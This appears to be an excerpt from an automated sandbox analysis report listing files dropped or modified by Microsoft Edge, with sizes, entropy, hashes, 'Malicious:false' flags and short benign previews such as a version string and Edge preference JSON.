                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:117.0.2045.47
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089566042894391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4SatBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynit5b7VLyMV/YoskFoz
                                                                                                                                                                                                      MD5:CB9B6735A4D790A68AF9BE06140D0799
                                                                                                                                                                                                      SHA1:A3315FAED2B88999FB345843CE13430B10581912
                                                                                                                                                                                                      SHA-256:DF69EBCF9AF30A4D9AE14D77EC3C91D5211ED0D3970D84E488F172544D1D99B9
                                                                                                                                                                                                      SHA-512:B7983FFC50C6D4574A43BDE1B5920AF7CBE40CBA78B0C2EE5464627E06F1E3439EB10E177AB757C5510C27165E8381358DB84304104B7758748EC46878F1B2E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2036785
                                                                                                                                                                                                      Entropy (8bit):4.001538834695065
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:uJrnBfMZRD6FF8Wn/z5b3gUK4bNwTVd5YiKT4x7wSvQvhfFpayB6JIIlwsKaQaDq:M
                                                                                                                                                                                                      MD5:CABE75F719B8712E4A58BA445AB4BF90
                                                                                                                                                                                                      SHA1:C42CDF85BC891D069FE59EB995C35D71E7CAEC14
                                                                                                                                                                                                      SHA-256:3144A69D92365BF4303B2A32691C00899F93363891CCB3EA8433016960A6806F
                                                                                                                                                                                                      SHA-512:6814C896078307F75F4DD889FE669D4035E7260B725E03399BF3F8DD63264B05C2DABC308CDD530123A3D68225525E463B15B0A3894FD291AC187C93A8CCF0AC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.........| .*.|....|. ..|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                      Size (bytes):2036785
                                                                                                                                                                                                      Entropy (8bit):4.001538834695065
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:uJrnBfMZRD6FF8Wn/z5b3gUK4bNwTVd5YiKT4x7wSvQvhfFpayB6JIIlwsKaQaDq:M
                                                                                                                                                                                                      MD5:CABE75F719B8712E4A58BA445AB4BF90
                                                                                                                                                                                                      SHA1:C42CDF85BC891D069FE59EB995C35D71E7CAEC14
                                                                                                                                                                                                      SHA-256:3144A69D92365BF4303B2A32691C00899F93363891CCB3EA8433016960A6806F
                                                                                                                                                                                                      SHA-512:6814C896078307F75F4DD889FE669D4035E7260B725E03399BF3F8DD63264B05C2DABC308CDD530123A3D68225525E463B15B0A3894FD291AC187C93A8CCF0AC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.........| .*.|....|. ..|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                      Malicious:false
